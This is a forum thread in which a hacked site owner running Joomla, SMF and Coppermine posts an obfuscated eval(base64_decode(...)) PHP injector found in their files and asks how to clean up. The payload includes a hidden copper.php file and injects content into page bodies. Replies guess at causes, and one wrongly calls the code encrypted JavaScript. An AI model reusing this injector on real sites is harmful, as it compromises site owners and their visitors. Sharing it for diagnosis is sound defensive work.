My account was hacked

[cafecommk]

I have an account with Bluehost and been happy withthem so far.
I was running joomla, smf 1.1.2 , coppermine and few other scripts.
Some of them i probably did not upgrade on time. I started having problems and now i am fixing things. In all my php folders i found code that is not mine. I want to post here, hopefully someone would know what to do.
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> and similar.
This one i found in the coppermine, similar i cleaned from smf and installed a new 1.5.9 joomla and hoping it is clean.

other than that, in time new folders appeared not mine and many files with names like: 1fb3de05033ccbda364186dfb7d697d9 . i attached one of them.

yesterday....i had a professional help me fix my smf and we worked the whole day....and at the end somehow it returned everything to how it was at first place. I wanted to shot myself. I felt miserable for taking his time and me not being able to fix my problems.

Is it possible that someone has control over my account? And how can i stop it?

Thank You all for reading.
Thank You more if anyone can help.

edit: any links where i can look for help are welcomed.

[ads2help]

Do u run any other scripts that written by you or someone else that you hire?

[cafecommk]

other scripts maybe like chat or list or similar. but nothing mine.
i really want to find out what and who is messing with me.

[kailash]

This is an encrypted JavaScrit code and I believe all you index page has this code. IFrame and Javascript hacking is now common way to inject code in pages. There are many reasons behind it. Some of them are as follow:

- Your FTP password is compromised.
- Your system is infected with spyware/worm/virus/trojan.
- Server is rooted.
- In secure script in your domain through which they can inject the code (i.e sql injection)

Kailash

[cafecommk]

Thank you Kailash. Can you direct me to sollutions or where can i learn more on how to check/fix things?
-i changed all my passwords
- do you know of any scaner for online folders?
-this is probably not up to me but the host
-i guess this is the worst...i have no ide how to clean up

[kailash]

Unfortunately, I am not sure about the root cause for this issue and hence there is no proper solution for this. But to prevent this, the host should secure the server and sometime a small security hole can create a problem.

Also there is a long discussion at cPanel for for this issue http://forums.cpanel.net/showthread.php?t=62821

This is not the issue with cPanel server but it also seen on plesk and DirectAdmin server too. I am not aware about any scanner to scan the file only.

Regards,

Kailash

[AndyCrow]

There's a possibility that the intruder is using your server as a means of storing programs. You've gotta watch out for that because lots of hackers store their illegal software/scripts/data on servers so that they can access them from anywhere AND disassociate themselves with the particular software or w/e it is that they are storing.

[3roken]

I've sent you a private message regarding your issue.

[justdoit1]

I've been afraid of Joomla. Without any web app firewalls, your site is always a victim for attackers.

[salomaso]

blin, write to support and this problem must be invise (sorry, me english is bad)
you have 100% chances, because all - mail and etc. you. Imho